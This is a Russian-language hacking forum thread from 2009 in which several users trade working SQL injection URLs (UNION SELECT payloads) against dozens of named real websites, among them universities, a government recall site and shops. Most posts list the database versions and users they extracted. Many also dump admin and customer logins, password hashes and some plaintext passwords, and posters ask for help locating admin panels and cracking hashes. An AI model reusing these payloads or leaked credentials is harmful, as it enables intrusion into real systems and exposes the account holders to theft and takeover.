http://larc.sdsu.edu/langmash/mashuplist.php?id=5678944+UNION+SELECT+1,2,concat_ ws(0x3a3a,email,username,password),4,5+FROM+mashup .admin_details--
jvitagli@mail.sdsu.edu::jvitagli::mashup
Database Version: 5.0.45-log
Database name: mashup
User name: fnu@localhost
А вот до этого не добрался http://sdsu.edu
Мож кто нить доберётся подскажите...
spherics
13.01.2009, 22:38
Типа Адалт и всё такое -) XXX
http://www.siam2play.com/play-clip.php?id=401798798798798+union+select+1,2,3,con cat_ws(0x3a3a,version(),user(),database()),5,6,7,8 ,9,10,11,12,13--&hasp=Sexy
Version:5.0.67-community-log
User:feedsone_ple@localhost
Database:feedsone_siam2play
http://www.beastiemixes.com/remixer.php?id=5234560+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4,5,6,7,8,9,10 ,11,12--
Version:4.1.22-max-log
User:beastiemixes2@64.202.163.149
Database:beastiemixes2
http://www.gamesinaflash.com/game.php?id=31234567+union+select+1,2,3,4,5,6,conc at_ws(0x3a3a,version(),user(),database()),8,9,10,1 1,12,13,14,15,16,17,18--
Version:4.1.22-standard
User:designnow@localhost
Database:designnow
_evgeniy_
13.01.2009, 23:40
http://mirsnov.ru/dream.php?id=-196+union+select+concat_ws(0x3a,name,pass),user(), version(),4,database(),6+FROM+authors+limit+5,1--
user: u90152@10.10.227.201
version: 5.0.67-log
database: u90152_mirsnov
http://mirsnov.ru/admin/
name: ornata
pass: 492446ef7a314e3983a73efd5e9ea4a1 197174 (также к емейлу подходит orlovanatalie@nm.ru)
http://www.uab.edu/lister/faq/index.php?askReferenceID=1&ID=-104+union+select+1,version(),3,4,5,6,7--
4.0.18-log
http://www.omnigraphics.com/category_view.php?ID=-3+union+select+1,version(),3,4,5--
4.1.22
http://www.medicalprogresstoday.com/spotlight/spotlight_indarchive.php?id=1147+union+select+1,ve rsion(),3,4,5,6,7--
http://www.omnigraphics.com/product_view.php?ID=-244++union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18--
+
http://www.rfidupdate.com/articles/index.php?id=-1447+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15--
http://stopstyle.ru/index.php?act=sb&r=1&m=4&sm=-1+union+select 1,2,version()--
4.1.22-log
http://www.scorpx.com/?item_id=-99999999%20UNION%20SELECT%201,concat_ws(%200x3a3a, version(),user(),database()),3,4,5%20%20--
version::5.0.67-community
user:: izhevskp_scorpx@localhost
database::izhevskp_scorpx
"Каталог программиста"
http://articles.org.ru/cn/?c=-16+union+select+1,2,unhex(hex(version())),4,5,6,7, 8,9,0,11--
Донецкий профессиональный футбольный клуб «Титан»
http://www.titan.dn.ua/base.php?chapter=textChapter&appellation=players&id=-2%20UNION%20SELECT%201,concat_ws(%200x3a3a,version (),user(),database()),3,4
version::5.0.27
user::titandnua@localhost
database::titandnua
http://uastar.com.ua/?target=site_details&id=-429%20UNION%20SELECT%201,2,3,version(),user(),6,da tabase(),8,9,10,11,12,13,14,15,16,17,18%20%20--
version::5.0.41-log
user::uastar-kiev-ua@localhost
database::u14215
http://uastar.com.ua/?target=site_details&id=-429%20UNION%20SELECT%201,2,3,password,5,6,login,8, 9,10,11,12,13,14,15,16,17,18%20FROM%20admins%20lim it%200,1%20--
aдин:: Sany
пасс:: h4$8j.
админку не нашол, потому как не умею её искать )) кто найдёт и пояснит как, буду очень признателен.
http://dromnyc.com/home/index.php/?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password) ,0,11,12+from+jos_users/*
PR = 5
muhtarim:7d784f7f6be34258ba9070dc7188dd87:dG0D2d7I jKj1oJrL
Наталья Солнцева- королева мистического детектива
http://www.solntseva.com/news_detail.php?id=-95%20UNION%20SELECT%201,2,concat_ws(%200x3a3a,vers ion(),user(),database()),4
version::5.0.67-community
user::solntsev_dbu@localhost
database::solntsev_db
http://www.solntseva.com/news_detail.php?id=-95%20UNION%20SELECT%201,username,user_password,4%2 0FROM%20phpdd_users%20limit%201,1%20--
админ::Татьяна_Н
пасс::5378190815408f70d85e421bc5eea6bd
кто нибудь, дайте сайт или прогу которые могут подбирать реально хеш!!! Буду очень благодарен.
http://otzuv.ru/view.htm?m_id=-1/**/union/**/select/**/1,version(),user(),4,5,database(),7,8,9,10,11,12,1 3,14,15,16--
Есть базы от phpbb, vbulletin, на сайте стоит ipb. Короче, полный ахтунг.
http://otzuv.ru/view.htm?m_id=-1/**/union/**/select/**/1,username,user_password,4,5,6,7,8,9,10,11,12,13,1 4,15,16/**/from/**/phpbb_users/**/limit/**/1,1--
wildshaman
14.01.2009, 21:33
http://www.tapsns.com/news.php?newsid=12+union+select+concat_ws(0x3a3a,v ersion(),user(),database()),2,3+--
5.0.67-community-nt::dream@localhost::dreamaccount
===================
http://www.ifsociety.com/viola/news.php?newsid=9999+union+select+1,2,3,4,5,concat _ws(0x3a3a,version(),user(),database())+--
5.0.45::ifsociety@10.1.0.13::ifsociety
===================
http://www.simbin.se/news.php?newsid=-120+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4,5+--
5.0.41-COMMUNITY-NT-LOG::SIMBINS_SIMBINSE@LOCALHOST::SIMBINS_SIMBINSE
===================
http://www.giacusa.com/news.php?newsid=-83+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6+--
5.0.67-COMMUNITY::GIACUSA2_1@LOCALHOST::GIACUSA2_
===================
http://www.polarware.com/news.php?newsid=1+union+select+1,concat_ws(0x3a3a, version(),user(),database()),3,4+--
4.1.22-standard::polar_website@localhost::polar_website
===================
http://www.somo.org/news.php?newsID=-406+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a3a,version(),user(),database()),12+--
5.0.51a-community-log::somoorg_sql@ns1.pennblog.com::somoorg_SOMO
===================
http://www.kingscollege.es/news.php?idnew=-31+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a3a,version(),user(),database()),12,13,14--
5.0.24-max-log::root@localhost::kingscollege_v2
===================
http://www.kcmurcia.es/news.php?idnew=-15+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a3a,version(),user(),database()),12,13,14+--
5.0.24-max-log::root@localhost::kcmurcia
===================
http://www.strumelab.com/news.php?idnew=5+union+select+1,2,3,concat_ws(0x3a 3a,version(),user(),database()),5,6,7,8,9,10,11,12 ,13+--
5.0.68-log::Sql163784@62.149.141.74::Sql163784_1
===================
http://www.premiumwanadoo.com/mfbeta/Public/News.php?IDnew=-28+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5+--
5.0.45-community-log::75f0df9a0a565091@10.103.0.12::4C8BA43K1
===================
http://www.likom-invest.ru/news.php?idnews=-773+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),4,5+--
5.0.67-log::u27657@10.10.153.184::u27657
===================
http://www.balivillagency.com/news.php?idnews=-10+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5+--
5.0.67-community-log::balivill_dwi@localhost::balivill_balivillagen cy
===================
На сегодня вроде все =)
_evgeniy_
15.01.2009, 03:59
http://abzru.com/news.php?id=-2006042502+union+select+1,2,3,concat_ws(0x3a,versi on(),user(),database()),5,6,7,8,9,10,11
5.0.67-community
abzrucom_abzru@localhost
abzrucom_abzru
http://www.cvvm.ru/modules/sections/index.php?op=listarticles&secid=1+union+select+version(),2+order+by+1&show=10%27
u19043@10.10.227.201
u19043
5.0.67-log
login: admin
pass: 9d1519a40153e1773b246cab2011784a
http://www.apto-m.ru/index.php?categoryid=1&action=show&id=-12%20union%20select%20concat_ws(0x3a,user(),versio n(),database())--
http://www.apto-m.ru/index.php?categoryid=1&action=show&id=-12%20union%20select%20concat_ws(0x3a,username,pass word)%20from%20apto_m_users--
u45423@10.10.227.201
5.0.67-log
u45423
http://idealcup.ru/news.php?id=-21+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database()),5
u8358@10.10.10.205
5.0.67-log
u8358
http://casting.teatr-obraz.ru/smember.php?cid=6-1&id=-50+union+select+1,concat_ws(user(),version(),datab ase()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7
u82908@10.10.227.201
5.0.67-log
u82908_casting
spherics
15.01.2009, 09:05
Пипец бомбил бомбил через принт всё нашел все вывел а тут тебе такое.
Зашел в Фак а там дефейс эээх...
Всё равно выложу.
http://www.checkim.com/faq/print_article.php?id=-63+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12--
4.1.22-standard-log
root@localhost
FAQ
http://www.checkim.com/faq/print_article.php?id=-63+union+select+1,2,concat_ws(0x3a3a,user,password ),4,5,6,7,8,9,10,11,12+from+mysql.user--
root::5577617b7e6129aa
хэш MySQL:5577617b7e6129aa:yahoo1
spherics
15.01.2009, 10:24
Опа Япона Извращена ТГП
http://www.japansexiest.com/gallery.php?ID=-2+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versio n(),user(),database()),8,9,10--
4.1.22-standard-log
japansex_japanse@localhost
japansex_tgp2
Магазин пакетиков всяких в общем для фасовок итд...
По базе заказов триста есть так что слабенько....
http://www.ampaconline.com/releaseview.php?id=-19+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6--
Database Version: 5.0.45
Database name: ampac
User name: ampac@localhost
Assembler
15.01.2009, 12:30
http://www.recalls.gov.au/view_recall_detail.php?Recall_ID_Auto=-13052%20union%20select%201,2,3,4,5,6,group_concat( column_name),8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70, 71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87 ,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,1 03,104,105,106,107,108,109,110,111,112,113,114,115 ,116,117,118,119,120,121,122,123,124,125,126,127,1 28,129,130,131,132,133,134,135,136,137,138,139,140 ,141,142,143,144,145,146,147,148,149,150,151,152,1 53,154%20from%20information_schema.columns%20where %20table_name%20=%200x61687073%20--
Уфф =))
http://www.realto.ru/journal/recomm/show/?id=-5258+union+select+1,2,3,4,5,concat_ws(0x3a,user(), database(),version())/*
PR6, Тиц 2100, но копать надо...
http://dma.ucla.edu/people/faculty.php?ID=9+union+select+1,2,3,4,5,6,concat_w s(0x3a,user(),database(),version()),8,9,10,11,12,1 3,14,15,16/*
wildshaman
15.01.2009, 19:25
http://www.ecocentr-rti.ru/product_view.php?id=-49+union+select+1,2,3,4,5,6,7,8+--
http://www.supratech.es/product_view.php?id=-81+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+--
http://www.omnigraphics.com/product_view.php?ID=-899+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18+--
http://www.yourmatchlessgifts.com/product_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,2,13,14,15, 16,17,18,19,20,21,22--
http://www.bandito.com/product_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2+--
http://www.rexheathcote.com/product_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--
https://www.tribecamedspa.com/product_view.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19+--
http://www.10001.com.cn/english/company/product_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22+--
http://www.inca-tvlifts.com/inca/print/product_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--
http://www.silencer.cc/product_view.php?id=-1+union+select+1,2,3,4,5,6,7+--
http://www.penridge.com/product_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+--
http://www.tonguestud.com/Catalog/product_view.php?id=-1+union+select+1,2,123213,4,5,6,7,8,9,10,11,12,13, 14,15,16+--
http://www.eyelaworld.com/product_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23+--
http://www.chailanherbalcare.com/product_view.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--
http://www.pcgroothandel.nl/product_view.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33+--
сегодняшняя партия =)
как благодарить все знают ^^
zifanchuck
16.01.2009, 00:23
сайт пола маккартни )))
http://www.paulmccartney.com/news.php?id=-1428+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,version(),20,21,22,23,24,25,26,27,28, 29,30,31,32,33--
версия там 5.0.67-community-log
))) крутите дальше сами)))
токо ничего ненатворите там)
http://www.bdnews24.com/details.php?cid=1&id=-66787+union+select+concat_ws(0x3a,username,passwor d),2,3,4+from+adminuser--
Если кто найдет админку- киньте линк в личку плиз.
+
PR3
http://www.planetgarth.com/news/article.php?cid=-01015+union+select+1,2,3,4,5,6,version(),8,9,10,11 ,12,13,14,15,16,17--
5.0.67
+
PR4
http://www.basicjokes.com/dtitles.php?cid=-286+union+select%201,2,3,version(),5,6,7,8,9,10,11 ,12,13,14,15--
5.0.45
_evgeniy_
16.01.2009, 04:05
http://vr-group.ru/details.php?id=-20+union+select+1,concat_ws(0x3a3a,database(),user (),version()),3,4
u65911
u65911@10.10.153.183
5.0.67-log
http://medpractika.ru/books/new/?id=-188+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
u16474@10.10.227.201
5.0.67-log
u16474
http://jobreg.ru/kadr_ags.php?reg_ag=-52+union+select+concat_ws(0x3a,user(),version(),da tabase())--
u14403@10.10.227.201
5.0.67-log
u14403_22
http://1mp.ru/news/?nid=-75+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5
u10773@10.10.227.201
5.0.67-log
u10773_2
http://velomot.com/mag/index.php?productID=-9959+union+select+concat_ws(0x3a,user(),version(), database())
u34452@10.10.227.201
5.0.67-log
u34452
http://velomot.com/mag/index.php?productID=-9959+union+select+group_concat(concat_ws(0x3a,Logi n,cust_password))+FROM+SS_customers
http://velomot.com/mag/index.php
anton:ecuwnpor,
Olga:ujhzybygtc,
VanWilder:00000,
Kein:21011922,
pavlkatya:8691,
alex-2609:935160,
wildshaman
16.01.2009, 08:51
http://www.tsesnabank.kz/about.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+--
http://www.vpartners.com/evolve/templates/about.php?id=-1+union+select+1,2,3,4+--
http://www.meacschools.org/about.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--
http://www.starcomms.com/about.php?id=-1+union+select+1,2,3,4+--
========================
http://www.goindiaholidays.com/about.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34+--
10C1BB8F9BFFF5FFAF8F87BC0D38C66B711F9622
4.1.21-standard:goindiaholidays:surat@localhost
=========================
http://www.abbotts.co.za/about.php?id=-1+union+select+1,2,3,4,5,6,7,8+--
http://www.whole-isticsolutions.com/about.php?ID=-1+union+select+1,2,3,4+--
http://www.mui.or.id/mui_in/about.php?id=-1+union+select+1,2,3,4,5,6,7,8+--
http://www.beebeedevelopments.co.uk/about.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+--
http://www.starcomms.com/about.php?id=-1+union+select+1,2,3,4+--
http://www.avt-systems.co.uk/about.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+--
===============
http://www.bostonhigashi.org/about.php?id=-1+union+select+1,2,3+--
4.1.22-log:bhs:sql@bostonhigashi.org@207.155.248.7
1638f92d7c501505
===============
благодарности как выписывать знаете =)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot